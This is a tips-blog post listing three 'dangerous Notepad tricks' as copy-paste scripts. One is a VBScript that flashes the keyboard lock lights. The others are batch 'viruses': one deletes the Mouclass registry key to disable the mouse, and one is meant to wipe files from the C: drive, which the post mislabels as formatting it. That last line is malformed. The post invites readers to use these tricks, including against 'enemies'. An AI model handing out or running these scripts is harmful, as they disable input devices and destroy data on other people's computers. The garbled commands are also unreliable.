Top 3 Cool Dangerous Notepad Tricks







1Create Disco Light On Keyboard 


discolights-Techzilla Firefox

  • To do this open Notepad and copy code
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

  • Save it with an extension .vbs (eg: your name.vbs)
  • In order to stop it just go the Task manager--> Process-->search wscript.exe -->End Process
See Also: Top 3 Danger Notepad Trick For Applying on Enemies.
    2. Disable Mouse By Creating a Virus  (harmful)

Disabling-mouse-Techzilla Firefox

  • Copy below code and paste into Notepad

rem Disable Mouse 


set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"


reg delete %key%


reg add %key% /v Start /t REG_DWORD /d 4


  • Save it with an extension .bat
See Also: Cool Notepad Tricks - Make Diary In Your Computer + Matrix (Hollywood) Falling Effect.

  3. Format C Drive by Creating a Virus   
     

formating-a-disk-by-creating-virus-Techzilla Firefox

See Also: How To Create Your Own Funny Virus - Continuously Eject All DVD/CD From Any Computer. 

  • Think, Think 100 times before do it **Extremly Harmful.

@ECHO OFF DEL C:\ *.*|Y
  •  Save this file with an extension .bat
  • Recommend as highly danger to your system
See Also: How To Make Your Computer Welcome You - Make Computer Speak to You
  

{ 0 comments... read them below or add one }

Post a Comment